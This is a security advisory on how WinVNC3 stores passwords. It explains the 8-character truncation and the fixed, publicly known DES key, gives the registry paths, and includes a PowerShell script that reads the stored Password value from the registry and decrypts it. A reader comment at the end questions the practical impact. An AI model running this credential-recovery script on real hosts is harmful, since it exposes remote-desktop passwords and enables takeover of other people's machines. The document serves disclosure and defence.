VNC is a free software package that lets users view and control a remote desktop in real time. To keep intruders out, the VNC server is password protected, and the stored password is encrypted with DES. The cipher itself is not the problem: the way VNC applies it (a fixed, publicly known key and an 8-character limit) is so weak that anyone with read access to the registry can recover the plain-text password.
Credit:
The information has been provided by: Conde Vampiro.
The software contains two vulnerabilities:
1) Fixed password length (up to 8 characters).
2) Fixed encryption key.
1) Fixed password length.
When the VNC server is installed on a Windows box, the encrypted password is stored under the following registry keys (look for the "Password" value):
\HKEY_CURRENT_USER\Software\ORL\WinVNC3
\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
When a password of arbitrary length is entered, the VNC server encrypts only the first 8 characters and silently discards the rest (shorter passwords are padded with zero bytes to fill the single 8-byte DES block). This is demonstrated here (key bytes are given in decimal, ciphertext in hexadecimal):
Input password -> micasaesazul
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 1f f1 6f 1a cc 34 64 f0
Input password -> micasaesroja
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 1f f1 6f 1a cc 34 64 f0
In both cases the VNC server stored the password as "micasaes", so the two passwords are indistinguishable to the server. A maximum of eight characters is too short to be a meaningful secret.
2) Fixed encryption key.
Whenever the VNC server encrypts a password it uses the same fixed key, so a given password always produces the same stored value. For example, the password "conde" is always stored as df 6b 7e e8 94 26 d8 b5. Since the software is open source, the key is public, which makes the encryption pointless: it is obfuscation, not protection.
Input password -> conde
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> df 6b 7e e8 94 26 d8 b5
Input password -> 2621
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 73 05 1d 22 49 b6 05 1c
The VNC server always uses this key (23 82 107 6 35 78 88 7) in the current version. This means that an attacker with read access to the registry can simply decrypt the stored value and obtain the plain-text password.
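The following PowerShell script is an added example, not code from the advisory or from the VNC project. It reproduces both weaknesses described above: it truncates a password to 8 characters and encrypts it with the fixed key, and it decrypts whatever is stored under the two registry keys named in the advisory. It assumes that VNC's d3des routine consumes the key bytes 23 82 107 6 35 78 88 7 with the bit order of each byte reversed relative to a standard DES implementation such as .NET's, so the key is written below as e8 4a d6 60 c4 72 1a e0; the function names (New-VncDes, ConvertTo-VncPassword, ConvertFrom-VncPassword, ConvertTo-HexString) are the example's own. Compare the hex the script prints for "conde" against the advisory's df 6b 7e e8 94 26 d8 b5 to confirm the key interpretation on your system.

```powershell
# Added example: encode and decode WinVNC3 passwords with the fixed DES key.
# Assumption: the advisory's key (23 82 107 6 35 78 88 7, i.e. 17 52 6b 06 23 4e 58 07)
# is fed to d3des with each byte's bits reversed, which is what a standard DES
# implementation such as .NET's needs to see as the raw key.
$VncKey = [byte[]](0xE8, 0x4A, 0xD6, 0x60, 0xC4, 0x72, 0x1A, 0xE0)

function New-VncDes {
    # Single-block DES in ECB mode with no padding: the stored value is exactly 8 bytes.
    $des = [System.Security.Cryptography.DES]::Create()
    $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $des.Padding = [System.Security.Cryptography.PaddingMode]::None
    $des.Key     = $VncKey
    return $des
}

function ConvertTo-VncPassword {
    # Mimics the server: keep the first 8 characters, zero-pad, encrypt one block.
    param([Parameter(Mandatory)][string]$Plain)
    $block = New-Object byte[] 8
    $src   = [System.Text.Encoding]::ASCII.GetBytes($Plain)
    [Array]::Copy($src, $block, [Math]::Min($src.Length, 8))
    $des = New-VncDes
    try   { $enc = $des.CreateEncryptor().TransformFinalBlock($block, 0, 8) }
    finally { $des.Dispose() }
    return ,$enc
}

function ConvertFrom-VncPassword {
    # Decrypts a stored value; anyone who can read the registry can run this.
    param([Parameter(Mandatory)][byte[]]$Stored)
    if ($Stored.Length -ne 8) { throw "expected an 8-byte value, got $($Stored.Length)" }
    $des = New-VncDes
    try   { $plain = $des.CreateDecryptor().TransformFinalBlock($Stored, 0, 8) }
    finally { $des.Dispose() }
    # Passwords shorter than 8 characters were zero-padded; strip that padding.
    return [System.Text.Encoding]::ASCII.GetString($plain).TrimEnd([char]0)
}

function ConvertTo-HexString {
    param([byte[]]$Bytes)
    return ($Bytes | ForEach-Object { $_.ToString('x2') }) -join ' '
}

# 1) Truncation: the two 12-character passwords from the advisory store identically.
$a = ConvertTo-VncPassword 'micasaesazul'
$b = ConvertTo-VncPassword 'micasaesroja'
"micasaesazul -> $(ConvertTo-HexString $a)"
"micasaesroja -> $(ConvertTo-HexString $b)"
"identical    : $((ConvertTo-HexString $a) -eq (ConvertTo-HexString $b))"
"decrypts to  : '$(ConvertFrom-VncPassword $a)'"
"conde        -> $(ConvertTo-HexString (ConvertTo-VncPassword 'conde'))"

# 2) Fixed key: read the stored value straight from the registry and decode it.
$paths = 'HKCU:\Software\ORL\WinVNC3',
         'Registry::HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3'
foreach ($path in $paths) {
    if (-not (Test-Path $path)) { continue }
    $stored = (Get-ItemProperty -Path $path -Name Password -ErrorAction SilentlyContinue).Password
    if ($stored) {
        "$path -> $(ConvertTo-HexString $stored) -> '$(ConvertFrom-VncPassword $stored)'"
    }
}
```

The registry section only prints something on a host where WinVNC3 is installed and the current user can read the key; the HKEY_USERS\.DEFAULT branch normally needs administrative rights. The truncation section runs anywhere .NET's DES is available, and the fact that it needs no secret input at all is the whole point of the advisory.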
Subject: so what
Date: 26 Jan. 2007
From: user
If you've got access to the registry you're already on the system so isn't getting access to VNC a bit academic at that point? From my understanding the registry password encryption is not meant to be algorithmically secure and isn't advertised as such. If you wanted algorithmic security you'd have to have a person at the local console type in the key every time the VNC service started. That isn't realistic, and isn't really useful since you're only protecting yourself from people who already have access to the system.